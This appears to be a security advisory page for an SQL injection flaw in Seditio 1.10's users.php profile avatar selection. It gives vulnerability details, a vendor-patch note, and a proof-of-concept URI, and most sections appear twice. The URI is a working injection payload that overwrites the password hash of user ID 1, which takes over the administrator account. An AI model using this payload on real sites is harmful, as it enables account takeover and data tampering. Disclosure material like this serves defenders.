Seditio Users.Profile.Inc.PHP SQL Injection Vulnerability
BID:21232
Info
Seditio Users.Profile.Inc.PHP SQL Injection Vulnerability
| Bugtraq ID: | 21232 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 21 2006 12:00AM |
| Updated: | Nov 28 2006 07:15PM |
| Credit: | Mustafa Can Bjorn is credited with the discovery of this vulnerability. |
| Vulnerable: |
Neocrome Seditio 1.10 |
| Not Vulnerable: | |
Discussion
Seditio Users.Profile.Inc.PHP SQL Injection Vulnerability
Seditio is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
Seditio 1.10 is vulnerable to this issue.
Seditio is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
Seditio 1.10 is vulnerable to this issue.
Exploit / POC
Seditio Users.Profile.Inc.PHP SQL Injection Vulnerability
An attacker can exploit this issue via a web client.
The following proof-of-concept URI demonstrates this vulnerability:
http://www.example.com/users.php?m=profile&a=avatarselect&x=011A99&id=default.gif%2500%2527,user_password=%2527e10adc3949ba59abbe56e057f20f883e%2527/**/wher
e/**/user_id=1/*
An attacker can exploit this issue via a web client.
The following proof-of-concept URI demonstrates this vulnerability:
http://www.example.com/users.php?m=profile&a=avatarselect&x=011A99&id=default.gif%2500%2527,user_password=%2527e10adc3949ba59abbe56e057f20f883e%2527/**/wher
e/**/user_id=1/*
Solution / Fix
Seditio Users.Profile.Inc.PHP SQL Injection Vulnerability
Solution:
The vendor has released a patch to address this issue.
Solution:
The vendor has released a patch to address this issue.
References
Seditio Users.Profile.Inc.PHP SQL Injection Vulnerability
References:
References: